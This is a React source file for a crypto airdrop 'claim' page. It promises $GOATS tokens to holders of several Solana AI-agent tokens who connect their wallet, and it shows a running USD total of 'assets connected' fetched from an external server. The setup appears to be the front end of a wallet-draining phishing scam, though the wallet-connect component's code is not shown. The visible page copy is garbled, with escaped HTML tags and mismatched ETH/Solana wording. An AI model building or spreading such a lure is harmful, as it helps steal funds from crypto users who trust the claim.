import { WalletAdapterNetwork } from "@solana/wallet-adapter-base";
import {
  ConnectionProvider,
  WalletProvider,
} from "@solana/wallet-adapter-react";
import { clusterApiUrl } from "@solana/web3.js";
import { useEffect, useMemo, useState } from "react";
import ConnectWalletButton from "./components/ConnectWalletButton";

import { WalletModalProvider } from "@solana/wallet-adapter-react-ui";
import "@solana/wallet-adapter-react-ui/styles.css";

function App() {
  const network = WalletAdapterNetwork.Mainnet;
  const [data, setData] = useState<{
    totalUsers: number;
    totalAssetsConnected: number;
  }>();
  const endpoint = useMemo(() => clusterApiUrl(network), [network]);
  const wallets = useMemo(
    () => [
      /*       new SolflareWalletAdapter({ network }),
      new PhantomWalletAdapter({ network }), */
    ],
    [network]
  );

  useEffect(() => {
    // Define the async function for fetching data
    async function fetchData() {
      const response = await fetch(
        "https://challenges-udqlurg7ma-ey.a.run.app"
      ); // Replace with your API
      if (!response.ok) {
        throw new Error("Network response was not ok");
      }
      const data = await response.json();
      setData(data);
    }

    fetchData(); // Call the function
  }, []);

  const dataElement = data ? (
    <div>
      <div>
        Total Users: {new Intl.NumberFormat("en-US").format(data.totalUsers)}
      </div>
      <div>
        Total Assets Connected:{" "}
        {new Intl.NumberFormat("en-US", {
          style: "currency",
          currency: "USD",
        }).format(data.totalAssetsConnected)}
      </div>
    </div>
  ) : (
    <div></div>
  );

  return (
    <div className="p-6 lg:px-12 min-h-dvh text-white/50 text-sm">
      <h1 className="text-lg text-white">
        $GOATS is the First Major AI Agent-Run Asset on Ethereum
      </h1>
      <p className="mt-10">&lt;p&gt; Welcome to the Communiy Mining Portal</p>
      <p className="mt-2.5">
        /participate in the most decentralized ai agent launch dedicated to
        100,000+ AI Agent asset holders
      </p>
      <p className="mt-2.5">How to Receive Your $GOATS at Launch&lt;/p&gt;</p>
      <ol className="list-decimal my-2.5 list-inside">
        &lt;ol&gt;
        <li>
          &lt;li&gt;Hold at least $5 in one of these AI Agent tokens on SOL:
          $GOAT, $GNON, $FART, $FLAVIA, $SHOGGOTH (as of October 31st) Input
          your wallet address below to see if you qualify&lt;/li&gt;
        </li>
        <li>
          &lt;li&gt;By doing that, you get access to your proportional share of
          $GOATS at launch to your ERC-20 Wallet.&lt;/li&gt;
        </li>
        &lt;/ol&gt;
      </ol>
      Claim your ETH wallet below to receive $GOATS at launch below
      <ConnectionProvider endpoint={endpoint}>
        <WalletProvider wallets={wallets} autoConnect>
          <WalletModalProvider>
            <ConnectWalletButton />
          </WalletModalProvider>
        </WalletProvider>
      </ConnectionProvider>
      <br />
      Claim tokens (available on 5th of November)
      <br />
      <br />
      {dataElement}
    </div>
  );
}

export default App;
